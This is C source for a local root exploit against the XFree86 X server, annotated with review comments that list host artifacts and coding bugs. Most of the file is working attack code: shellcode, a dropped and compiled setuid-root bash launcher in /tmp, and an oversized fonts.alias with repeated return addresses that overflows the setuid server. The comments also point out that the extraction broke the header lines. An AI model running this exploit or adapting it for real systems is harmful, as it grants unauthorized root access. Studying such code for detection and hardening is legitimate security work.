/* xfree86 juarez tested on: slackware 9.1, 8.0 redhat 9 gentoo 1.4 enz00@angrypacket.com pr0pz to ap hex0rz for testing!@# */

/*
 * Review notes (code left byte-identical; comments only). This is a
 * historical local exploit against the XFree86 X server. What the file
 * visibly does, in order:
 *
 *   1. writes /tmp/boomsh.c (a setuid(0)/setgid(0) /bin/bash launcher)
 *      and compiles it with /usr/bin/gcc to /tmp/boomsh;
 *   2. writes ./fonts.dir and ./fonts.alias in the current directory, the
 *      latter being 1024 '0' bytes followed by a repeated return address;
 *   3. execle()s the X server binary (XFree86 or Xwrapper) with "-fp $PWD"
 *      so it parses those two font files, with the shellcode as the only
 *      environment string.
 *
 * Host artifacts a responder can look for: /tmp/boomsh.c, /tmp/boomsh
 * (intended to end up setuid-root per the shellcode comment below), and a
 * fonts.alias whose single line is ~1 KiB of '0' characters. The overflowed
 * component is presumably the server's fonts.alias handling — inferred
 * from the payload shape, not shown in this file. Running the X server
 * without setuid-root privilege removes the privilege gain this relies on.
 *
 * The two #include lines and the "Usage:%s" line below lost their
 * angle-bracketed text in extraction; as shown, the file does not
 * preprocess.
 */
#include /* header name lost in extraction */
#include /* header name lost in extraction */

/* total bytes of the fonts.alias payload: 1024 filler + 96 address bytes + 1 newline */
#define BUF 1121

/* chmod/chown /tmp/boomsh - ripped from TESO */
/* Delivered to the X server through the environment (see env[] in main).
 * The trailing bytes "\x2e\x74\x6d\x70\x2e\x62\x6f\x6f\x6d\x73\x68\x2e"
 * are the ASCII string ".tmp.boomsh.", consistent with the author's
 * chmod/chown /tmp/boomsh comment; the instruction bytes are not decoded
 * further here. */
char shellcode[]=
"\x31\xc0\xb0\x46\xbb\xff\xff\xff\xff\x31\xc9\xcd\x80\xeb"
"\x2a\x90\x90\x90\x90\x5e\x89\xf3\xff\x03\xff\x43\x04\x31"
"\xc0\x88\x43\x0b\x31\xc0\xb0\xb6\x31\xc9\x31\xd2\xcd\x80"
"\x31\xc0\xb0\x0f\x66\xb9\xed\x0d\xcd\x80\x31\xc0\x40\xcd"
"\x80\xe8\xd5\xff\xff\xff\x2e\x74\x6d\x70\x2e\x62\x6f\x6f"
"\x6d\x73\x68\x2e";

/*
 * Entry point. argv[1] selects the target binary ("1" -> Xwrapper, anything
 * else -> XFree86); with no argument a usage message is printed and the
 * program exits 0. Side effects: files written under /tmp and the current
 * directory, a gcc child process, and finally an execle() that replaces
 * this process with the X server. Returns 0 only if execle() fails.
 */
int main(int argc, char *argv[])
{
    char *env[2] = {shellcode,NULL};   /* the only environment string the X server will see */
    int i;
    long ret,*buffaddr;
    char *buffer,*pwd;
    /* source of the setuid-root shell helper dropped in /tmp */
    char *boomsh = "int main(){setuid(0);setgid(0);system(\"/bin/bash\");}\n";
    char *xf;
    char path[20] = "/usr/X11R6/bin/";
    /* NOTE: 15-byte prefix + "XFree86" (7) or "Xwrapper" (8) + NUL needs 23-24
     * bytes; the strcat() calls below write past this 20-byte array (UB). */
    char all[20];
    FILE *blah;

    pwd = getenv("PWD");        /* may be NULL; passed unchecked to execle as the -fp font path */
    buffer = malloc(BUF);       /* allocation result is not checked */
    strcpy(all,path);

    if(argc < 2){
        fprintf(stderr," -- XFree86 c0dez --\n");
        fprintf(stderr," enz00@angrypacket.com\n\n");
        fprintf(stderr,"Usage:%s \n",argv[0]);   /* argument placeholder after %s presumably lost in extraction */
        fprintf(stderr,"Targets: (0) XFree86\n \t (1) Xwrapper\n");
        exit(0);
    }

    /* Target selection. ret is presumably the guessed stack address of the
     * environment string (0xbffffffa minus the string lengths). Note the
     * asymmetry: the Xwrapper branch subtracts strlen(xf), the XFree86
     * branch strlen(all); whether that is intentional is not visible here. */
    if(strcmp(argv[1],"1") ==0){
        xf = "Xwrapper";
        ret = 0xbffffffa - strlen(shellcode) - strlen(xf);
        strcat(all,xf);
    }else{
        xf = "XFree86";
        strcat(all,xf);
        ret = 0xbffffffa - strlen(shellcode) - strlen(all);
    }

    /* create /tmp/boomsh */
    /* fopen()/fclose() results are unchecked throughout; a NULL here is a
     * crash in fprintf, not an error message. */
    blah = fopen("/tmp/boomsh.c","w");
    fprintf(blah,"%s",boomsh);
    fclose(blah);
    system("/usr/bin/gcc /tmp/boomsh.c -o /tmp/boomsh");   /* shells out to gcc; /tmp/boomsh remains on disk afterwards */

    /* setup fonts.dir */
    /* one-entry font directory so the server accepts the -fp path */
    blah = fopen("./fonts.dir","w");
    fprintf(blah,"1\nword.bdf -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1");
    fclose(blah);

    /* setup fonts.alias */
    memset(buffer,'0',1024);               /* 1024 bytes of '0' filler */
    buffaddr = (long *)(buffer+1024);
    for(i=0;i < 96;i+=4){
        *(buffaddr++) = ret;               /* 24 copies of ret; the i+=4 stepping assumes sizeof(long)==4 */
    }
    /* newline at byte 1120; nothing NUL-terminates the buffer, and it is
     * exactly BUF bytes, so the "%s" below reads past the allocation (UB). */
    strncpy(buffaddr,"\n",1);

    /* write buffer to fonts.alias */
    blah = fopen("./fonts.alias","w");
    fprintf(blah,"%s",buffer);
    fclose(blah);
    free(buffer);

    // call program with our buffer as env
    /* "-fp pwd" points the server at the fonts.dir/fonts.alias written above.
     * The trailing 0 is an int where a (char *)NULL argv terminator is
     * expected — UB in varargs; in practice it only works where int and
     * pointer have the same width (the 32-bit targets listed at the top). */
    execle(all,xf,":1","-fp",pwd,0,env);
    return 0;
}